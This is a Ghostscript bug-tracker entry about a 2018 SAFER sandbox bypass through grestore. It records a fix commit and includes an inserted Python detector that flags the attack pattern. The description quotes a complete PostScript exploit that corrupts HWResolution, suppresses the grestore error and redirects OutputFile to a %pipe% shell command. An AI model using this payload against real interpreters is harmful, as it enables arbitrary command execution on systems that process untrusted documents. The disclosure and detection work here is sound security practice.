Bug 699687

Summary: grestore can bypass SAFER
Product: Ghostscript
Reporter: Ken Sharp <ken.sharp>
Component: General
Assignee: Chris Liddell (chrisl) <chris.liddell>
Status: RESOLVED FIXED
Severity: normal
CC: cbuissar, esachse, scorneli, taviso
Priority: P4
Version: unspecified
Hardware: PC
OS: Windows 7
Customer:
Word Size: ---

Description Ken Sharp 2018-08-29 07:01:10 UTC
This has been moved from the never-ending bug #699654, the last comment in that thread demonstrates a similar issue to the original report, but using grestore instead of restore:

-------------------------------------------------------------------------------
GS>currentpagedevice wcheck ==
false
GS>currentpagedevice /HWResolution get wcheck ==
true

You can't def HWResolution (for example), but you can just put or astore into it. If you put some junk in there, then grestore doesn't work:

GS>a0
GS>currentpagedevice /HWResolution get 0 (foobar) put
GS>grestore
Error: /rangecheck in .installpagedevice

Then LockSafetyParams is false again:

GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get == pop
false


That doesn't work with save (only gsave), so full exploit:

a0
currentpagedevice /HWResolution get 0 (foobar) put
{ grestore } stopped {} if
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
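A defender-side check for the pattern reported above, added here as an example that is not part of the bug report or of Ghostscript: it scans a PostScript job for the indicators the comment describes (an OutputFile redirected to %pipe%, a grestore wrapped in stopped so its failure is swallowed, a put into the HWResolution array) and flags the job. The indicator names, regexes and sample input are constructed for this example.

```python
import re

# Constructed sample input: the sequence quoted in the bug report.
SUSPICIOUS_PS = """a0
currentpagedevice /HWResolution get 0 (foobar) put
{ grestore } stopped {} if
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
"""

# Constructed benign job for comparison.
BENIGN_PS = """%!PS
/Helvetica findfont 12 scalefont setfont
72 72 moveto (hello) show
showpage
"""

# Indicator names and patterns are our own, not Ghostscript identifiers.
INDICATORS = {
    # OutputFile pointed at the %pipe% IODevice (command execution sink).
    "pipe_outputfile": re.compile(r"/OutputFile\s*\(\s*%pipe%", re.I),
    # Any OutputFile change pushed through putdeviceprops.
    "outputfile_putdeviceprops": re.compile(r"/OutputFile\b[^\n]*putdeviceprops"),
    # grestore whose error is deliberately swallowed.
    "guarded_grestore": re.compile(r"\{\s*grestore\s*\}\s*stopped"),
    # Writing junk into the (writeable) HWResolution array.
    "hwresolution_put": re.compile(r"/HWResolution\s+get\s+\d+\s+\([^)]*\)\s+put"),
    # Probing the SAFER lock state.
    "locksafety_query": re.compile(r"\.LockSafetyParams"),
}


def scan_postscript(text):
    """Return the names of all indicators present in a PostScript job."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def is_suspicious(text):
    """Flag a job that redirects OutputFile to a pipe, or that combines a
    swallowed grestore failure with a device-property change."""
    hits = set(scan_postscript(text))
    if "pipe_outputfile" in hits:
        return True
    return "guarded_grestore" in hits and "outputfile_putdeviceprops" in hits
```

Run this over jobs before handing them to an interpreter that relies on -dSAFER; a hit is a reason to reject or sandbox the job, not proof of exploitation.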
Comment 1 Ken Sharp 2018-09-01 10:16:55 UTC
*** Bug 699697 has been marked as a duplicate of this bug. ***
Comment 2 Ken Sharp 2018-09-01 10:33:04 UTC
I have a fix for this which I've asked Chris to review, especially to review any non-standard devices which might be vulnerable in the same way. I imagine we'll have a fix committed shortly.
Comment 3 Ken Sharp 2018-09-03 07:42:33 UTC
Commit 7ba6d80c69f0c74601ffc1077d27e0d1a299e57f addresses this issue.